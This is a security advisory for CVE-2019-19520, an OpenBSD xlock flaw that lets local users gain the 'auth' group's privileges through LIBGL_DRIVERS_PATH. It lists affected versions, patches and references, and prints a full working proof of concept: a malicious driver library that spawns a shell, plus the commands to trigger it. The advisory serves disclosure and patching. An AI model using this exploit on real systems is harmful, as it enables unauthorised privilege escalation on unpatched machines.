Allele Security Alert
ASA-2019-00651
Identifier(s)
ASA-2019-00651, CVE-2019-19520
Title
Local privilege escalation via xlock
Vendor(s)
The OpenBSD Project
Product(s)
OpenBSD
Affected version(s)
OpenBSD versions 6.6 before errata 009
OpenBSD versions 6.5 before errata 020
Fixed version(s)
OpenBSD version 6.6 errata 009
OpenBSD version 6.5 errata 020
OpenBSD versions 6.6 with the following patch applied:
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
OpenBSD versions 6.5 with the following patch applied:
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Proof of concept
Yes
Description
xlock in OpenBSD allows local users to gain the privileges of the auth group by providing a LIBGL_DRIVERS_PATH environment variable, because xenocara/lib/mesa/src/loader/loader.c mishandles dlopen.
Technical details
On OpenBSD, /usr/X11R6/bin/xlock is installed by default and is set-group-ID “auth”, not set-user-ID; the following check is therefore incomplete and should use issetugid() instead:
101 _X_HIDDEN void * 102 driOpenDriver(const char *driverName) 103 { ... 113 if (geteuid() == getuid()) { 114 /* don't allow setuid apps to use LIBGL_DRIVERS_PATH */ 115 libPaths = getenv("LIBGL_DRIVERS_PATH");
A local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group “auth”:
$ id uid=32767(nobody) gid=32767(nobody) groups=32767(nobody) $ cd /tmp $ cat > swrast_dri.c << "EOF" #include <paths.h> #include <sys/types.h> #include <unistd.h> static void __attribute__ ((constructor)) _init (void) { gid_t rgid, egid, sgid; if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__); if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__); char * const argv[] = { _PATH_KSHELL, NULL }; execve(argv[0], argv, NULL); _exit(__LINE__); } EOF $ gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c $ env -i /usr/X11R6/bin/Xvfb :66 -cc 0 & [1] 2706 $ env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66 $ id uid=32767(nobody) gid=11(auth) groups=32767(nobody)
Credits
Qualys Research Team
Reference(s)
OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html
OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Constrain honouring of path-related environment variables based upon
https://github.com/openbsd/xenocara/commit/5886ab525a096cb2504f9e3ce1cd4fd79fb1e414
Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14
oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5
Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8
CVE-2019-19520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19520
CVE-2019-19520
https://nvd.nist.gov/vuln/detail/CVE-2019-19520
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: February 11, 2020